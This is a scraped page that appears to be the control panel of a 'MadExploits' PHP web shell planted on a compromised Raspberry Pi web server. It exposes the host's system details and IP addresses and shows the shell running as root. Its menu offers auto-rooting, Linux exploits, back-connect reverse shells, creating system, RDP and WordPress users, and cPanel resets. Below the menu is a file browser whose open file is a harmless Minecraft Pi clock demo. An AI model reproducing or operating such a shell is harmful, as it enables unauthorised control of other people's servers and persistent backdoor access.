Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
minecraft-pi /
api /
java /
src-demos /
pi /
demo /
[ HOME SHELL ]
Name
Size
Permission
Action
sokoban
[ DIR ]
drwxr-xr-x
ChristmasTreeDemo.java
1.76
KB
-rw-r--r--
DigitalClock.java
759
B
-rw-r--r--
LoopDemo.java
423
B
-rw-r--r--
LowLevelDemo.java
1.05
KB
-rw-r--r--
TextDemo.java
673
B
-rw-r--r--
TurtleDemo.java
1.39
KB
-rw-r--r--
Usage.java
225
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : DigitalClock.java
package pi.demo; import java.text.DateFormat; import java.util.Date; import pi.Minecraft; import pi.tool.Text; /** * * @author Daniel Frisk, twitter:danfrisk */ public class DigitalClock { public static void main(String[] args) { //Text textTool = Minecraft.connect(args).tools.text; String lastTime = ""; DateFormat timeFormatter = DateFormat.getTimeInstance(DateFormat.SHORT); while (true) { String time = timeFormatter.format(new Date()); if (!time.equals(lastTime)) { System.out.println(time); lastTime = time; } try { Thread.sleep(100); } catch (InterruptedException _) { } } } }
Close